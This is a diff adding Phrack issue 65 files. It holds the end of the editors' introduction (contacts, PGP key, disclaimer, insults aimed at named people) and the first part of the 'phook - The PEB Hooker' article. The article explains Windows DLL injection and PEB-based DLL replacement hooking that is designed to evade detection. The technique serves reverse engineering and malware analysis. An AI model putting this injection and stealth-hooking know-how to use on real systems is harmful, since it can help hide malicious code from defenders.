+september 2008. Shouts to all south american hackers & expats.
+
+No shouts: All supposed "Underground people" who asked us million 
+times when Phrack will be out but never contribute to the magazine. If 
+you guys were a little more productive perhaps Phrack would be released 
+more often. Also, we will -not- help poor indonesians bypassing 
+government's p0rn websites filters. Sorry taufiks1428@gmail.com.
+
+Lames:
+
+* cucamonga (xt@docking.gaykansascity.com) has joined #phrack
+<el> why hasnt phrack65 been leaked yet
+<vegas> probably coz i don't have it
+<shiftee> probably cause nobody wants to read it
+
+Phrack has not been leaked this time...sorry for that... probably because
+shiftee needs to sharpen his hacking skills instead of posing on IRC. He
+could also read Phrack, we will not deny his IP address. Any questions,
+send us an email.
+
+Flames: vegas (insecure wannabe), HDM (pwnie coward)
+
+Enjoy the magazine!
+
+
+[-]=====================================================================[-]
+
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors. Phrack Magazine is made available to the
+public, as often as possible, free of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : circle[at]phrack{dot}org
+Submissions       : circle[at]phrack{dot}org
+Commentary        : loopback[@]phrack{dot}org
+Phrack World News : pwn[at]phrack{dot}org
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+(Hint: Always use the PGP key from the latest issue)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.4.5 (GNU/Linux)
+
+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
+X8CVYa2m
+=yjXZ
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+-EOF-
+
diff --git a/phrack65/10.txt b/phrack65/10.txt
new file mode 100644
index 0000000..a4c18a8
--- /dev/null
+++ b/phrack65/10.txt
@@ -0,0 +1,23221 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x0a of 0x0f
+
+|=-----------------------------------------------------------------------=|
+|=---------------------=[ phook - The PEB Hooker ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ [Shearer] - eunimedesAThotmail.com ]=---------------=|
+|=----------------=[ Dreg      - DregATfr33project.org  ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=--=[ http://www.fr33project.org / Mirror: http://www.disidents.com ]=--=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ October 15 2007 ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+
+------[  Index
+
+     0.- Foreword
+
+     1.- Introduction
+    
+     2.- Previous concepts
+        2.1 - Process Environment Block
+            2.1.1 - LoaderData
+        2.2 - Import Address Table
+            2.2.1 - Load of the Import Address Table
+        2.3 - Starting a process in suspended state
+        2.4 - Injection of a DLL in a process
+        2.5 - Hooks in ring3
+            2.5.1 - Problems
+                
+     3.- Design
+        3.1 - Fore steps to PEB HOOKING
+        3.2 - Exchange of data in LoaderData
+        3.3 - Dynamic load of modules
+        3.4 - Repairing the IAT
+        3.5 - Starting execution
+        3.6 - The APIs that work with modules
+        3.7 - A new concept: DLL MINIFILTER
+        3.8 - Frequent Problems
+    
+     4.- phook
+        4.1 - InjectorDLL
+        4.2 - Console Control
+        4.3 - CreateExp
+            4.3.1 - Forwarder DLL
+        4.4 - ph_ker32.dll
+            4.4.1 - Stack problems
+            4.4.2 - Registry problems
+            4.4.3 - The JMP macro
+            4.4.4 - Versions
+        4.5 - Using phook
+            4.5.1 - DLL MINIFILTER
+        4.6 - Frequent Problems
+    
+     5.- TODO
+    
+     6.- Testing
+    
+     7.- Advantages and possibilities
+     
+     8.- Conclusion
+    
+     9.- Acknowledgements
+    
+    10.- Related Works
+    
+    11.- References
+    
+    12.- Source Code
+
+
+------[ 0.- Foreword
+
+Nomenclatures:
+    .- [T.Index]: related works (section 10).
+    .- [R.Index]: references (section 11).
+Index is the identificator of the nomenclatures.
+
+To understand the document it is needed to have knowledge in win32 about:
+    - Types of executables:
+        - PE32 [R.3]: DLLs, EXE... 
+    - Programming:
+        - Use of APIs [R.20]: LoadLibrary, GetModuleHandle ...
+        - Hooks [R.10] [R.8] [...]
+    - Win32 ASM [R.21].
+
+Two terms will be used along all the document:
+    1.- DLL_FAKE: DLL that will supplant a legitim DLL (DLL_REAL).
+    2.- DLL_REAL: DLL that will be supplanted by DLL_FAKE.
+
+Unless stated otherwise, hook/s will always refer to hook/s in win32.
+
+
+------[ 1.- Introduction
+
+Hooks in win32 are commonly used to do reverse engineering, the most common
+motivations are the analisys of malware and packers, software protection
+systems. Hooks are also used to monitorize parts of a software: access to
+files, sockets, registry modification...
+
+The actual methods to realize hooks in ring3 (see section 2.5) has
+different problems (see section 2.5.1). The most important problem for us
+was that  some software can detect them. There are software protection
+systems that are able to alter the flow of execution when they detect some
+kind of unknown hook, even the most sophisticated are able to eliminate
+some types of hooks and continue the normal flow of execution.
+
+Another problem comes while atempting to realize a hook in the virus that
+tracks API's addresses in memory, disabling some types of hooks like IAT
+HOOKING (see section 2.5). There are software protection systems that use
+some technics of virus and viceversa.
+
+Due to these problems we have created phook, which uses a few documented
+method to realize hooks in ring3 and it even makes some virus techniques
+to use our hook.
+
+This document explains how phook works and the PEB HOOKING [T.1] method.
+phook is a tool that uses PEB HOOKING [T.1] to realize a hook of a DLL, it
+also allows to realize other tasks interactively:
+    - List loaded modules.
+    - Load a DLL.
+    - Download a DLL.
+    - ...
+
+The PEB HOOKING [T.1] method consists in supplanting a DLL_REAL in memory
+by a DLL_FAKE, so all modules of a process that use DLL_REAL now will use
+DLL_FAKE.
+
+
+------[ 2 - Previous concepts
+
+To understand the PEB HOOKING [T.1] method and how phook works, it is
+needed to have clear understanding of some concepts:
+
+
+------[ 2.1 - Process Environment Block
+
+Process Environment Block (PEB) is a structure [R.1] located in the
+user's space, that contains the process' enviroment data [R.2]:
+    - Enviroment variables.
+    - Loaded modules list.
+    - Addresses in memory of the Heap.
+    - If the process is being depurated.
+    - ...
+
+    ------[ CODE
+    
+    typedef struct _PEB
+    {   
+        BOOLEAN InheritedAddressSpace;
+        BOOLEAN ReadImageFileExecOptions;
+        BOOLEAN BeingDebugged;
+        BOOLEAN Spare;
+        HANDLE  Mutant;
+        PVOID ImageBaseAddress;
+        PPEB_LDR_DATA LoaderData;
+        PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+        PVOID SubSystemData;
+        PVOID ProcessHeap;
+        PVOID FastPebLock;
+        PPEBLOCKROUTINE FastPebLockRoutine;
+        PPEBLOCKROUTINE FastPebUnlockRoutine;
+        ...
+        
+    } PEB, *PPEB;
+    
+    ------[ END CODE
+
+To realize PEB HOOKING it is needed to use the field LoaderData [T.1].
+
+
+------[ 2.1.1 - LoaderData
+
+It is a structure [R.1] in which there are some data about the modules
+of a process. It is a doubly linked list and it can be sorted by three
+criteria [R.2]:
+    1.- Order of loading
+    2.- Order in memory
+    3.- Order of initialization
+
+    ------[ CODE
+
+    typedef struct _PEB_LDR_DATA
+    {
+        ULONG Length;
+        BOOLEAN Initialized;
+        PVOID SsHandle;
+        LIST_ENTRY InLoadOrderModuleList;
+        LIST_ENTRY InMemoryOrderModuleList;
+        LIST_ENTRY InInitializationOrderModuleList;
+	
+
+    } PEB_LDR_DATA, *PPEB_LDR_DATA;
+    
+    ------[ END CODE
+
+All flink and blink fields in LIST_ENTRY are in reality pointers
+to LDR_MODULE.
+    
+    ------[ CODE
+    
+    typedef struct _LIST_ENTRY {
+    	struct _LIST_ENTRY * Flink;
+    	struct _LIST_ENTRY * Blink;
+    	
+    } LIST_ENTRY,*PLIST_ENTRY;
+    
+    ------[ END CODE
+
+The data that we are going to manipulate from LDR_MODULE to realize
+PEB HOOKING are [T.1]:
+    - BaseAddress: The base of the module in memory.
+    - EntryPoint : Address where the module's first instruction to
+                   be executed can be found.
+    - SizeOfImage: Size of the module in memory.
+
+    ------[ CODE
+
+    typedef struct _LDR_MODULE
+    {
+        LIST_ENTRY InLoadOrderModuleList;
+        LIST_ENTRY InMemoryOrderModuleList;
+        LIST_ENTRY InInitializationOrderModuleList;
+        PVOID BaseAddress;
+        PVOID EntryPoint;
+        ULONG SizeOfImage;
+        UNICODE_STRING FullDllName;
+        UNICODE_STRING BaseDllName;
+        ULONG Flags;
+        SHORT LoadCount;
+        SHORT TlsIndex;
+        LIST_ENTRY HashTableEntry;
+        ULONG TimeDateStamp;
+
+    } LDR_MODULE, *PLDR_MODULE;
+    
+    ------[ END CODE
+
+
+------[ 2.2 - Import Address Table
+
+Import Address Table (IAT) is a table that the PE32 [R.3] have,
+which fills the win32 loader when a module [R.4] is loaded and also on 
+late loading using stub at IAT.
+
+External symbols that need a module are called importations, the symbols
+that a module provide to other modules are called exportations.
+
+In the IAT [R.3] of a module there are the addresses of its importations,
+that is, in the IAT [R.3] of a module there are the addresses of the
+exportations it uses from other modules.
+
+
+------[ 2.2.1 - Load of the Import Address Table
+
+For the win32 loader to be able to obtain the exportation it needs to
+know: the module where it is located, the name of the exportation and/or
+the ordinal [R.3].
+
+The PE32 has a structure called IMAGE_IMPORT_DESCRIPTOR [R.5] where we
+can highlight the fields:
+    - Name              : Name of the module where the exportations are
+                          located.
+    - OriginalFirstThunk: Address of the table where the names and/or
+                          the ordinals of the exportations that the
+                          module imports are located.
+    - FirstThunk        : Address of a table, identical to
+                          OriginalFirstThunk, where the win32 loader
+                          puts the addresses of the importations.
+			
+    ------[ CODE
+    
+    typedef struct _IMAGE_IMPORT_DESCRIPTOR {
+    	DWORD OriginalFirstThunk;
+    	DWORD TimeDateStamp;
+    	DWORD ForwarderChain;
+    	DWORD Name;
+    	DWORD FirstThunk;
+    	
+    } IMAGE_IMPORT_DESCRIPTOR,*PIMAGE_IMPORT_DESCRIPTOR;
+    
+    ------[ END CODE
+
+Each entry of the table of FirstThunk and OriginalFirstThunk has two
+fields [R.3]:
+    - Hint: if the first 31/63 bits are 0x80000000 it will import only
+            taking account the ordinal, otherwise the name will be used.
+            The bits 15-0 represent the ordinal.
+    - Name: Address where the name of the exportation is located.
+    
+    ------[ CODE
+    
+    typedef struct _IMAGE_IMPORT_BY_NAME {
+    	WORD Hint;
+    	BYTE Name[1];
+    	
+    } IMAGE_IMPORT_BY_NAME,*PIMAGE_IMPORT_BY_NAME;
+    
+    ------[ END CODE
+
+
+------[ 2.3 - Starting a process in suspended state
+
+When it is wanted to create a process in suspended state it is necessary to
+know which type it is [R.6]:
+    - Console
+    - GUI
+
+Console type processes can be created with the API CreateProcess and the
+flag CREATE_SUSPENDED.
+
+If GUI type processes are opened with the flag CREATE_SUSPENDED may not
+work correctly, so they must be created using the APIs:
+    1.- CreateProcess   : Process is created without the flag
+                          CREATE_SUSPENDED.
+    2.- WaitForInputIdle: Correct load of the process [R.6] is waited for.
+    3.- SuspendThread   : The main thread is suspended.
+
+
+------[ 2.4 - Injection of a DLL in a process
+
+To inject a DLL in a process there are many methods [R.7], the most
+simple is using the APIs:
+    1.- VirtualAllocEx    : To reserve memory in the process.
+    2.- WriteProcessMemory: To write in the reserved space a code that
+                            loads a DLL.
+    3.- CreateRemoteThread: A thread is created in the process that
+                            executes the written code.
+    4.- VirtualFreeEx     : Once the DLL is loaded reserved memory is
+                            freed.
+
+
+------[ 2.5 - Hooks in ring3
+
+There always has been many forms to realize "hooks" in win32, as much in
+ring3 as in ring0. The problem about working in ring0 lies in that if
+something fails the OS may become unstable. The most stable method for
+the OS is to realize the "hook" from ring3.
+
+The most known methods are:
+    - IAT HOOKING: Entries in the IAT [R.3] are modified, which puts the
+                   loader in win32, so it points to another zone [R.8].
+                   
+    - PUSH + RET: In a code area PUSH DIRECTION and RET are introduced to
+                  jump to the desired address.
+                  Generally it is needed to pass the control to the
+                  original area, having to restore it in a determined
+                  moment [R.9].
+    
+    - SetWindowHook...: With these APIs, a callback may be registered
+                        for different events of the system [R.10].
+
+
+------[ 2.5.1 - Problems
+
+Some problems in the methods to realize hooks in ring3:
+
++-------------------------------------------------------------------------+
+| Some Methods           | Some problems                                  |
++------------------------+------------------------------------------------+
+| IAT HOOKING [R.8]      | 1.- The IAT [R.3] of all the loaded modules    |
+|                        |     have to be changed.                        |
+|                        | 2.- A module does not need IAT [R.3] to use    |
+|                        |     symbols exported by others.                |
+|                        | 3.- It is very well known.                     |
+|                        | 4.- Easy to repair.                            |
+|                        | 5.- Can be detectable.                         |
+|                        | 6.- Does not allow full control from the start.|
+|------------------------+------------------------------------------------|
+| PUSH + RET [R.9]       | 1.- The method is not generic for all the areas|
+|                        |     of the code.                               |
+|                        | 2.- It is complicated to implement.            |
+|                        | 3.- Easy to repair.                            |
+|                        | 4.- Can be detectable.                         |
+|                        | 5.- Does not allow full control from the start.|
+|------------------------+------------------------------------------------|
+| Other "hooks":         | 1.- Does not allow full control.               |
+| SetWindowHook... [R.10]| 2.- Easy to repair.                            |
+|                        | 3.- Can be detectable.                         |
+|------------------------+------------------------------------------------|
+| PEB HOOKING [T.1]      | 1.- It is complicated to implement.            |
+|                        | 2.- The original DLL and the injected have to  |
+|                        |     export the same symbols in the same order  |
+|                        |     (at least).                                |
+|                        | 3.- Can be detectable.                         |
+|                        | 4.- Does not allow full control from the start.|
++------------------------+------------------------------------------------+
+
+Note: This table only represents the opinion of the authors.
+
+Calls from ring3 to ring0 using SYSENTER cannot be controlled by means of
+the previous methods only. A system call from ring3 can be realized with
+SYSENTER [R.11] without happening through any DLL, of such way that the
+previous methods are made unusable in this pretty rare situation.
+
+Due to the previous problems, we have decided to use PEB HOOKING [T.1] to
+create a engine that realizes more than "hooks": phook - The PEB Hooker.
+
+Note: The advantages and possibilities of PEB HOOKING [T.1] are explained
+in section 7.
+
+
+------[ 3.- Design
+
+In this section it will be spoken of the base design to realize PEB
+HOOKING [T.1] successfully. The implementation is not complicated when it
+is understood why each thing is done.
+
+The steps:
+    
+    1.- Load DLL_FAKE and DLL_REAL.
+    
+    2.- In the list that uses the loader in win32, in which all the
+        loaded modules in this moment are located, it has to exchange
+        many fields between DLL_FAKE and DLL_REAL.
+        
+    3.- It is necessary that the IATs [R.3] of all the loaded modules,
+        except DLL_REAL and maybe DLL_FAKE point to the functions that
+        the DLL_FAKE exports.
+        
+
+------[ 3.1 - Fore steps to PEB HOOKING
+
+It is necessary before anything to load a DLL_FAKE into the memory of the 
+process, to which it is wanted to realize PEB HOOKING [T.1]. The DLL_FAKE
+must have at least the same exportations and the same order of DLL_REAL.
+
+
+------[ 3.2 - Exchange of data in LoaderData
+
+It is necessary to search DLL_FAKE and DLL_REAL for some identificative
+fields of LDR_MODULE, once found the following data will be exchanged:
+    - EntryPoint
+    - BaseAddress
+    - SizeOfImage (almost always)
+
+The search using the field BaseDllName will obtain the data of LDR_MODULE
+pertaining to DLL_FAKE. Some virus, packers and APIs use this form of
+search to find the BaseAddress or EntryPoint of a module.
+
+It is necessary to change the field SizeOfImage in the case that DLL_FAKE
+and DLL_REAL do not have the same size in memory.
+
+Searching flow of BaseAddress of kernel32.dll in a process without
+PEB HOOKING [T.1]:
+
+                     0     +---------------------------------+
+   [ process ] ---------+  | Process Environment Block (PEB) |
+                        |  |---------------------------------|
+                        |  | InheritedAddressSpace           |
+                        |  | ReadImageFileExecOptions        |
+                        |  | BeingDebugged                   |
+                        |  | Spare                           |
+                        |  | Mutant                          |
+                        |  | ImageBaseAddress                |
+                        +->| LoaderData                      |--+
+                           | ...                             |  |
+                           +---------------------------------+  | 1
+                                                                |
+                                                                |
+ +--------------------------------------------------------------+
+ |  +----------------------------+     +----------------------------+
+ |  |          LoaderData        |     |         LDR_MODULE         |
+ |  +----------------------------+     |----------------------------| flink
+ |  | Length                     |     | InLoadOrderModList         |-----+
+ |  | Initialized                |     | InMemoryOrderModList       |     |
+ |  | SsHandle                   |     | InInitOrderModList         |     |
+ +->| InLoadOrderModList         |  2  | ...                        |     |
+    | InMemoryOrderModList       |---->| BaseDllName   "ntdll.dll"  |---+ |
+    | InInitOrderModList - Flink |     +----------------------------+   | |
+    +----------------------------+ +------------------------------------+ |
+                                   |   +----------------------------+     |
+                                   |   |   LDR_MODULE (DLL_REAL)    |     |
+                                   |   |----------------------------|     |
+                                   |   | InLoadOrderModList         |   6 |
+    +---------------------+     3  |   | InMemoryOrderModList       |     |
+    |   "kernel32.dll"    |<-------+   | InInitOrderModList         |     |
+    +---------------------+            | BaseAddress  7C801000      |     |
+        8 |     |4       ^        7    | ...                        |     |
+    Yes <-+     +-> No   +-------------| BaseDllName "kernel32.dll" |<----+
+     |               | 5               | ...                        |
+   9 |               v                 +----------------------------+
+     |            NextLdrModule();
+     v
+ kernel32.dll = 7C801000
+
+
+Searching flow of BaseAddress of kernel32.dll in the previous process with
+PEB HOOKING [T.1]:
+
+                     0     +---------------------------------+
+   [ process ] ---------+  | Process Environment Block (PEB) |
+                        |  |---------------------------------|
+                        |  | InheritedAddressSpace           |
+                        |  | ReadImageFileExecOptions        |
+                        |  | BeingDebugged                   |
+                        |  | Spare                           |
+                        |  | Mutant                          |
+                        |  | ImageBaseAddress                |
+                        +->| LoaderData                      |--+
+                           | ...                             |  |
+                           +---------------------------------+  | 1
+                                                                |
+                                                                |
+ +--------------------------------------------------------------+
+ |  +----------------------------+     +----------------------------+
+ |  |          LoaderData        |     |         LDR_MODULE         |
+ |  +----------------------------+     |----------------------------| flink
+ |  | Length                     |     | InLoadOrderModList         |-----+
+ |  | Initialized                |     | InMemoryOrderModList       |     |
+ |  | SsHandle                   |     | InInitOrderModList         |     |
+ +->| InLoadOrderModList         |  2  | ...                        |     |
+    | InMemoryOrderModList       |---->| BaseDllName   "ntdll.dll"  |---+ |
+    | InInitOrderModList - Flink |     +----------------------------+   | |
+    +----------------------------+ +------------------------------------+ |
+                                   |   +----------------------------+     |
+                                   |   |   LDR_MODULE (DLL_REAL)    |     |
+                                   |   |----------------------------|   6 |
+                                   |   | InLoadOrderModList         |     |
+    +---------------------+     3  |   | InMemoryOrderModList       |flink|
+    |   "kernel32.dll"    |<-------+   | InInitOrderModList         |--+  |
+    +---------------------+            | BaseAddress 7C801000       |  |  |
+       12 |     |4-8   ^ ^        7    | ...                        |  |  |
+    Yes <-+     +-> No | +-------------| BaseDllName "old_k32.dll"  |<-|--+
+     |           5-9 | +------------+  | ...                        |  |
+  13 |               v              |  +----------------------------+  |
+     |            NextLdrModule();  +-+                                |
+     v                                | +----------------------------+ |
+ kernel32.dll = 005C5000              | |   LDR_MODULE (DLL_FAKE)    | | 10
+                                      | |----------------------------| |
+                                  11  | | InLoadOrderModList         | |
+                                      | | InMemoryOrderModList       | |
+                                      | | InInitOrderModList         | |
+                                      | | BaseAddress 005C5000       | |
+                                      | | ...                        | |
+                                      +-| BaseDllName "kernel32.dll" |<+
+                                        | ...                        |
+                                        +----------------------------+
+                                        
+Results of the search in the process:
+    1.- BaseAddress without PEB HOOKING [T.1]: 7C801000 (DLL_REAL)
+    2.- BaseAddress with PEB HOOKING [T.1]: 005C5000 (DLL_FAKE)
+
+PD: Generally searching by InLoadOrderModList, the first field that shows
+    up is the LDR_MODULE corresponding to the main module. In the
+    example it has been omited for the sake of clarity.
+    
+
+------[ 3.3 - Dynamic load of modules
+
+When a process, in that PEB HOOKING [T.1] has been done, loads a module
+dynamically [R.12] that has importations from DLL_REAL, its IAT [R.3]
+will be loaded automatically with the necessary exportations of DLL_FAKE.
+
+
+------[ 3.4 - Repairing the IAT
+
+Except in the modules DLL_FAKE and DLL_REAL, all the IATs [R.3] that have
+exportations of the DLL_REAL shall be replaced by the corresponding ones
+from DLL_FAKE. The IAT [R.3] of DLL_FAKE is not due to change in case the
+exportations of DLL_REAL are needed to be used.
+
+If the IAT [R.3] of DLL_FAKE has been modified so the exportations of
+DLL_REAL are the same ones of DLL_FAKE, a call to a exportation of
+DLL_REAL from the same exportation of DLL_FAKE, will enter in an
+infinite recursive loop, causing stack overflow.
+    
+    +--------------------------+     +--------------------------------+
+    |      .text DLL_FAKE      |     |               IAT              |
+    |--------------------------|     |--------------------------------|
+    | ...                      |     | LocalAlloc  1 (Nr_LocalAlloc)  |
+    | PUSH EBP                 |  +->| LoadLibrary 2 (Nr_LoadLibrary) |--+
+    | MOV EBP, ESP             |  |  |  ....                          |  |
+    | ...                      |  |  +--------------------------------+  |
+    | LoadLibrary_FAKE:        |  |                                      |
+ +->| PUSH original_lib_name   |  | 0                                    |
+ |  | CALL IAT[Nr_LoadLibrary] |--+                                      |
+ |  | ...                      |                                         |
+ |  | POP EBP                  |                                         |
+ |  | RET                      |                                         |
+ |  | ...                      |                                         |
+ |  +--------------------------+                                         |
+ |                                          1                            |
+ +-----------------------------------------------------------------------+
+
+The real problem is that we are calling ourselves either directly or
+indirectly by one or various DLLs. It is not due to repair the IAT [R.3]
+of any module (DLL_ANY) when DLL_FAKE calls an exportation of DLL_ANY that
+at the same time calls an exportation of DLL_FAKE that implies to call
+again the same exportation direct or indirectly from DLL_ANY.
+
+Flow of a call to RtlHeapAlloc, when PEB HOOKING [T.1] has been done over
+NTDLL.DLL and the IAT of kernel32.dll has been changed:
+
+Example:
+
+[ process ]
+ |
+ | CALL RtlHeapAlloc                         CALL LoadLibrary
+ +-------------------> [DLL_FAKE ntdll.dll] ------------------+
+              0         ^                           1         |
+                        | CALL RtlInitUnicodeString           v
+                        +--------------------------- [DLL_ANY kernel32.dll]
+                                          2
+
+
+Flow of a call to RtlHeapAlloc, when PEB HOOKING [T.1] has been done over
+NTDLL.DLL and the IAT [R.3] of kernel32.dll has NOT been changed:
+
+[ process ]<----------------+
+ |                       4  |
+ | CALL RtlHeapAlloc        |                 CALL LoadLibrary
+ +-------------------> [ DLL_FAKE ntdll.dll] ------------------+
+    0                       ^                       1          |
+         +------------------+                                  |
+         |    3                                                |
+         |                CALL RtlInitUnicodeString            v
+[DLL_REAL old_nt.dll] <--------------------------- [DLL_ANY kernel32.dll]
+                                          2
+                                          
+Note: The scheme has been simplified, omiting the rest of calls of
+      DLL_FAKE.
+
+
+Flow of a normal call to LoadLibrary in a process (without PEB HOOKING
+[T.1]):
+
+            CALL IAT[Nr_LoadLibrary]  +--------------------------------+
+[process] -------------------------+  |                IAT             |
+   ^                0              |  |--------------------------------|
+   |                               |  | LocalAlloc  1 (Nr_LocalAlloc)  |
+   |    +-----------------------+  +->| LoadLibrary 2 (Nr_LoadLibrary) |-+
+   |    | DLL_REAL kernel32.dll |     |  ....                          | |
+   |    |-----------------------|     +--------------------------------+ |
+   |    | ...                   |                  1                     |
+   |    | LoadLibrary:          | <--------------------------------------+
+   | 2  | PUSH EBP              |
+   |    | MOV EBP, ESP          |
+   |    | ...                   |
+   |    | POP EBP               |
+   +----| RET                   |
+        | ...                   |
+        +-----------------------+
+
+The flow is normal and passes directly by DLL_REAL.
+
+    
+Flow of a call to LoadLibrary in a process with PEB HOOKING [T.1]:
+
+            CALL IAT[Nr_LoadLibrary]  +--------------------------------+
+[process] -------------------------+  |                IAT             |
+   ^                0              |  |--------------------------------|
+   |                               |  | LocalAlloc  1 (Nr_LocalAlloc)  |
+   |  +-------------------------+  +->| LoadLibrary 2 (Nr_LoadLibrary) |-+
+   |  | DLL_FAKE  kernel32.dll  |     |  ....                          | |
+   |  |-------------------------|     +--------------------------------+ |
+ 4 |  | ...                     |                     1                  |
+   |  | Own_LoadLibrary:        | <--------------------------------------+
+   |  | PUSH EBP                |
+   |  | MOV EBP, ESP            |       +-----------------------------+
+   |  | // Own functions...     |   2   | DLL_REAL  old_k32.dll       |
+   |  | CALL IAT[Nr_LoadLibrary]|----+  |-----------------------------|
+   |  | POP EBP                 |<-+ |  | ...                         |
+   +--| RET                     |  | +->| LoadLibrary:                |
+      |   ...                   |  |    | PUSH EBP                    |
+      +-------------------------+  |    | MOV EBP, ESP                |
+                                   |    | ...                         |
+                                 3 |    | POP EBP                     |
+                                   |    | RET                         |--+
